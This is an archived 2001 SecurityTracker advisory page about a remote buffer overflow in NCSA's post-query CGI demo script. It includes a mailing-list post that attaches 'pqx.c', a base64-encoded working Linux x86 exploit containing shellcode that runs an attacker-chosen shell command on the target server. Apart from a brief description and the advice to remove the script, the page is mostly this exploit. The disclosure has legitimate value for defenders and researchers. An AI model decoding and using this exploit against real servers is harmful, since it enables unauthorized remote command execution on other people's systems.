SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Post-query CGI Vendors:   NCSA
Re: NCSA Post-query CGI Code Allows Remote Code Execution
SecurityTracker Alert ID:  1001107
SecurityTracker URL:  http://securitytracker.com/id/1001107
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 16 2001
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  

Description:   The post-query CGI code originally written by NCSA reportedly contains a vulnerability that allows remote users to specify arbitrary code that will be executed by the server with the privileges of the cgi script.

The author of this message supplies the following demonstration exploit code (the usual caveats apply here).

For the code, see:

http://www.energymech.net/users/proton/pqx.c

Or, decode the file from the message below.

Impact:   A remote user can cause arbitrary code to be executed on the server.
Solution:   It is recommended that users remove this application. It was only intended as demonstration code, not for production use.
Vendor URL:  ftp.ncsa.uiuc.edu/Web/httpd/Unix/ncsa_httpd/cgi/cgi-src (Links to External Site)
Cause:   Boundary error

Message History:   This archive entry is a follow-up to the message listed below.
Mar 16 2001 NCSA Post-query CGI Code Allows Remote Code Execution



 Source Message Contents

Subject:  Exploit: pqx.c -- post-query (CGI) remote buffer overflow


This is a multi-part message in MIME format.
--------------2EDE4EE86E51446E80D83F27
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Attached is a working exploit program for Linux-ix86.

You may or may not be vulnerable to this exploit
depending on a number of factors.

Better safe than sorry, remove post-query if you have it.
It is an example program designed to demonstrate how posting
to CGI works and as such isnt useful for any normal
webserver operations.

In case the attachement is corrupted or lost, there is
a copy available at;

http://www.energymech.net/users/proton/pqx.c

/proton
[ http://www.energymech.net/users/proton/ ]
--------------2EDE4EE86E51446E80D83F27
Content-Type: application/octet-stream; name="pqx.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pqx.c"

LyoKIHwgIHBxeC5jIC0tIHBvc3QtcXVlcnkgYnVmZmVyIG92ZXJmbG93IGV4cGxvaXQgZm9y
IExpbnV4LWl4ODYKIHwgIENvcHlyaWdodCAoYykgMjAwMSBieSBwcm90b24uIEFsbCByaWdo
dHMgcmVzZXJ2ZWQuCiB8CiB8ICBUaGlzIHByb2dyYW0gaXMgZnJlZSBzb2Z0d2FyZTsgeW91
IGNhbiByZWRpc3RyaWJ1dGUgaXQgYW5kL29yIG1vZGlmeQogfCAgaXQgdW5kZXIgdGhlIHRl
cm1zIG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSBhcyBwdWJsaXNoZWQgYnkK
IHwgIHRoZSBGcmVlIFNvZnR3YXJlIEZvdW5kYXRpb247IGVpdGhlciB2ZXJzaW9uIDIgb2Yg
dGhlIExpY2Vuc2UsIG9yCiB8ICAoYXQgeW91ciBvcHRpb24pIGFueSBsYXRlciB2ZXJzaW9u
LgogfAogfCAgVGhpcyBwcm9ncmFtIGlzIGRpc3RyaWJ1dGVkIGluIHRoZSBob3BlIHRoYXQg
aXQgd2lsbCBiZSB1c2VmdWwsCiB8ICBidXQgV0lUSE9VVCBBTlkgV0FSUkFOVFk7IHdpdGhv
dXQgZXZlbiB0aGUgaW1wbGllZCB3YXJyYW50eSBvZgogfCAgTUVSQ0hBTlRBQklMSVRZIG9y
IEZJVE5FU1MgRk9SIEEgUEFSVElDVUxBUiBQVVJQT1NFLiAgU2VlIHRoZQogfCAgR05VIEdl
bmVyYWwgUHVibGljIExpY2Vuc2UgZm9yIG1vcmUgZGV0YWlscy4KICovCiNpbmNsdWRlIDxz
dGRpby5oPgojaW5jbHVkZSA8c3RkbGliLmg+CiNpbmNsdWRlIDxzdHJpbmcuaD4KI2luY2x1
ZGUgPHVuaXN0ZC5oPgojaW5jbHVkZSA8c3lzL3R5cGVzLmg+CiNpbmNsdWRlIDxzeXMvc29j
a2V0Lmg+CiNpbmNsdWRlIDxuZXRpbmV0L2luLmg+CiNpbmNsdWRlIDxhcnBhL2luZXQuaD4K
I2luY2x1ZGUgPG5ldGRiLmg+CiNpbmNsdWRlIDxlcnJuby5oPgoKY2hhcgl0bXBbNTEyXTsK
Y2hhcgkqaG9zdDsKY2hhcgkqcHJvZ25hbWU7CmNoYXIJKmNvbW1hbmQ7CgojZGVmaW5lIG91
dHB1dCh4KQl3cml0ZSgxLHgsc2l6ZW9mKHgpKQoKdW5zaWduZWQgY2hhciBzaGVsbGNvZGVb
XSA9CgkiXHhlYlx4M2JceDVlXHg4ZFx4NWVceDEwXHg4OVx4MWVceDhkXHg3ZVx4MThceDg5
XHg3ZVx4MDRceDhkXHg3ZVx4MWJceDg5XHg3ZVx4MDgiCgkiXHhiOFx4NDBceDQwXHg0MFx4
NDBceDQ3XHg4YVx4MDdceDI4XHhlMFx4NzVceGY5XHgzMVx4YzBceDg4XHgwN1x4ODlceDQ2
XHgwY1x4ODgiCgkiXHg0Nlx4MTdceDg4XHg0Nlx4MWFceDg5XHhmMVx4OGRceDU2XHgwY1x4
YjBceDBiXHhjZFx4ODBceDMxXHhkYlx4ODlceGQ4XHg0MFx4Y2QiCgkiXHg4MFx4ZThceGMw
XHhmZlx4ZmZceGZmXHgwMVx4MDFceDAxXHgwMVx4MDFceDAxXHgwMVx4MDFceDAxXHgwMVx4
MDFceDAxXHgwMVx4MDEiCgkiXHgwMVx4MDFceDAwIjsKCnZvaWQgbmV0cGlwZShpbnQgKnJz
b2NrLCBpbnQgKndzb2NrLCBpbnQgc3opCnsKCXN0cnVjdAlzb2NrYWRkcl9pbiBzYWk7Cglz
dHJ1Y3QJaG9zdGVudCAqaGU7CglpbnQJczsKCglpZiAoIWhvc3QgfHwgISpob3N0IHx8ICFj
b21tYW5kIHx8ICEqY29tbWFuZCkKCXsKCQlwcmludGYoIlVzYWdlOiAlcyA8aG9zdD4gXCI8
Y29tbWFuZD5cIlxuIixwcm9nbmFtZSk7CgkJZXhpdCgxKTsKCX0KCWhlID0gZ2V0aG9zdGJ5
bmFtZShob3N0KTsKCWlmICghaGUpCgl7CgkJcHJpbnRmKCIlczogVW5rbm93biBob3N0XG4i
LGhvc3QpOwoJCWV4aXQoMSk7Cgl9CgoJcyA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFN
LDApOwoJc2FpLnNpbl9mYW1pbHkgPSBBRl9JTkVUOwoJc2FpLnNpbl9wb3J0ID0gaHRvbnMo
ODApOwoJbWVtY3B5KCZzYWkuc2luX2FkZHIsaGUtPmhfYWRkcl9saXN0WzBdLHNpemVvZihz
dHJ1Y3QgaW5fYWRkcikpOwoKCWlmIChjb25uZWN0KHMsKHN0cnVjdCBzb2NrYWRkciopJnNh
aSxzaXplb2Yoc2FpKSkgPCAwKQoJewoJCXN3aXRjaChlcnJubykKCQl7CgkJY2FzZSBFQ09O
TlJFRlVTRUQ6CgkJCW91dHB1dCgiQ29ubmVjdGlvbiByZWZ1c2VkLlxuIik7CgkJCWJyZWFr
OwoJCWNhc2UgRVRJTUVET1VUOgoJCQlvdXRwdXQoIkNvbm5lY3Rpb24gdGltZWQgb3V0Llxu
Iik7CgkJCWJyZWFrOwoJCWNhc2UgRU5FVFVOUkVBQ0g6CgkJCW91dHB1dCgiTmV0d29yayB1
bnJlYWNoYWJsZS5cbiIpOwoJCQlicmVhazsKCQlkZWZhdWx0OgoJCQlvdXRwdXQoIlVua25v
d24gZXJyb3IuXG4iKTsKCQkJYnJlYWs7CgkJfQoJCWV4aXQoMSk7Cgl9CglvdXRwdXQoIkNv
bm5lY3Rpb24gZXN0YWJsaXNoZWQuXG4iKTsKCgkqcnNvY2sgPSAqd3NvY2sgPSBzOwoJc3By
aW50Zih0bXAsIlBPU1QgL2NnaS1iaW4vcG9zdC1xdWVyeSBIVFRQLzEuMFxyXG5Db250ZW50
LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZFxyXG4iCgkJIkNvbnRl
bnQtTGVuZ3RoOiAlaVxyXG5cclxuIixzeik7Cgl3cml0ZShzLHRtcCxzdHJsZW4odG1wKSk7
Cn0KCnZvaWQgX19kb2l0KHZvaWQpOwoKI2RlZmluZSBDTURTVFVCCQkiL2Jpbi9zaCAtYyAl
c0AiCgppbnQgbWFpbihpbnQgYXJnYywgY2hhciAqKmFyZ3YpCnsKCWNoYXIJKnEsKmNwOwoJ
aW50CWluLG91dDsKCWludAlzeix4LG47CgoJaWYgKGFyZ2MgPCAzKQoJewoJCWZwcmludGYo
c3RkZXJyLCJVc2FnZTogJXMgPGhvc3RuYW1lPiBcIjxjb21tYW5kPlwiXG4iLGFyZ3ZbMF0p
OwoJCWV4aXQoMSk7Cgl9CgoJcHJvZ25hbWUgPSBhcmd2WzBdOwoJaG9zdCA9IGFyZ3ZbMV07
Cgljb21tYW5kID0gYXJndlsyXTsKCgl4ID0gKDIqc3RybGVuKHNoZWxsY29kZSkpICsgc3Ry
bGVuKGNvbW1hbmQpICsgc2l6ZW9mKENNRFNUVUIpOwoJc3ogPSA5OTk5ICsgeDsKCgluZXRw
aXBlKCZpbiwmb3V0LHN6KTsKCgl0bXBbMF0gPSAwOwoJZm9yKHN6PTA7c3o8OTk5OTtzeisr
KQoJewoJCXN0cmNhdCh0bXAsIiYiKTsKCQlpZiAoc3RybGVuKHRtcCkgPiA1MDApCgkJewoJ
CQl3cml0ZShvdXQsdG1wLHN0cmxlbih0bXApKTsKCQkJdG1wWzBdID0gMDsKCQl9Cgl9Cgl3
cml0ZShvdXQsdG1wLHN0cmxlbih0bXApKTsKCglzcHJpbnRmKHRtcCwiJiVzPSVzIixzaGVs
bGNvZGUsc2hlbGxjb2RlKTsKCXEgPSBzdHJjaHIodG1wLDApOwoJc3ByaW50ZihxLENNRFNU
VUIsY29tbWFuZCk7Cgl3cml0ZShvdXQsdG1wLHgpOwoKCW91dHB1dCgiU2VudCBvdXIgc2hp
dC5cbiIpOwoKCW4gPSB4ID0gMDsKCWZvcig7OykKCXsKCQlzeiA9IHJlYWQoaW4sJnRtcFt4
XSw1MTIteCk7CgkJaWYgKHN6IDwgMSkKCQkJYnJlYWs7CgkJeCArPSBzejsKCQlxID0gY3Ag
PSB0bXA7CgkJZm9yKHN6PXg7c3o7KQoJCXsKCQkJaWYgKCpxID09ICdcbicpCgkJCXsKCQkJ
CWlmIChzdHJuY21wKGNwLCI8bGk+IDxjb2RlPiA9IDwvY29kZT4iLHEtY3ApKQoJCQkJCXdy
aXRlKDEsY3AsKHEtY3ApKzEpOwoJCQkJZWxzZQoJCQkJaWYgKCFuKQoJCQkJewoJCQkJCXdy
aXRlKDEsIlxuPCEtLSBpZ25vcmluZyAxMCwwMDAgbGluZXMgb2YgY3JhcCAtLT5cblxuIiw0
MSk7CgkJCQkJbisrOwoJCQkJfQoJCQkJY3AgPSBxICsgMTsKCQkJfQoJCQlxKys7CgkJCXN6
LS07CgkJfQoJCWlmIChjcCAhPSB0bXApCgkJewoJCQlzeiA9IHggLSAoY3AgLSB0bXApOwoJ
CQltZW1jcHkodG1wLGNwLHN6KTsKCQkJeCAtPSAoY3AgLSB0bXApOwoJCX0KCX0KCWV4aXQo
MCk7Cn0K
--------------2EDE4EE86E51446E80D83F27--


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC